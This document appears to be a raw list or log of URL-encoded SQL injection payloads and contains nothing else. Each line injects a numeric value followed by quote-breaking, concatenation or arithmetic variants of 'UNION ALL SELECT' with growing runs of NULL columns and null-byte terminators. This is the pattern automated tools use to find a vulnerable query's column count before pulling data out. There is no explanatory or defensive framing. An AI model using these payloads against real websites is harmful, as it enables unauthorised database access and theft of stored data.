1234.5%22%20WHERE%203650%3D3650%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%206488%3D6488%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%209809%3D9809%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%208566%3D8566%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205916%3D5916%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%202715%3D2715%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20%7C%7C%20%28SELECT%209012%20FROM%20DUAL%20WHERE%207830%3D7830%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205814%20FROM%20DUAL%20WHERE%202961%3D2961%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208736%20FROM%20DUAL%20WHERE%206876%3D6876%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204723%20FROM%20DUAL%20WHERE%202031%3D2031%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205051%20FROM%20DUAL%20WHERE%208568%3D8568%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201573%20FROM%20DUAL%20WHERE%205542%3D5542%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205647%20FROM%20DUAL%20WHERE%204467%3D4467%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204060%20FROM%20DUAL%20WHERE%203547%3D3547%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209952%20FROM%20DUAL%20WHERE%201433%3D1433%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202666%20FROM%20DUAL%20WHERE%207127%3D7127%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207701%20WHERE%202018%3D2018%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209003%20WHERE%205721%3D5721%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202724%20WHERE%204951%3D4951%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207186%20WHERE%201593%3D1593%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205092%20WHERE%202464%3D2464%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208453%20WHERE%204216%3D4216%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204021%20WHERE%202761%3D2761%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207817%20WHERE%204350%3D4350%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209703%20WHERE%209459%3D9459%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206343%20WHERE%204447%3D4447%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208280%20FROM%20DUAL%20WHERE%209556%3D9556%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201500%20FROM%20DUAL%20WHERE%204890%3D4890%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201475%20FROM%20DUAL%20WHERE%203470%3D3470%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%209191%20FROM%20DUAL%20WHERE%207937%3D7937%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207899%20FROM%20DUAL%20WHERE%209480%3D9480%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%208861%20FROM%20DUAL%20WHERE%205702%3D5702%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203404%20FROM%20DUAL%20WHERE%207370%3D7370%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207149%20FROM%20DUAL%20WHERE%205409%3D5409%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201520%20FROM%20DUAL%20WHERE%208749%3D8749%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%205143%20FROM%20DUAL%20WHERE%206702%3D6702%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202295%20WHERE%203747%3D3747%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%204121%20WHERE%206443%3D6443%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%209121%20WHERE%202254%3D2254%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202884%20WHERE%208680%3D8680%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202458%20WHERE%208443%3D8443%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%209786%20WHERE%206303%3D6303%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206659%20WHERE%208454%3D8454%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%209469%20WHERE%207132%3D7132%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201018%20WHERE%203446%3D3446%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206990%20WHERE%208695%3D8695%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%27%20%2B%20%28SELECT%20%27TWZw%27%20FROM%20DUAL%20WHERE%209887%3D9887%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27pDLk%27%20FROM%20DUAL%20WHERE%209040%3D9040%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27iYHD%27%20FROM%20DUAL%20WHERE%205083%3D5083%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27EbBe%27%20FROM%20DUAL%20WHERE%209614%3D9614%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tJAM%27%20FROM%20DUAL%20WHERE%207423%3D7423%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27MFNt%27%20FROM%20DUAL%20WHERE%206152%3D6152%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FOmV%27%20FROM%20DUAL%20WHERE%205836%3D5836%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UVZd%27%20FROM%20DUAL%20WHERE%207652%3D7652%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27bCDG%27%20FROM%20DUAL%20WHERE%208614%3D8614%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 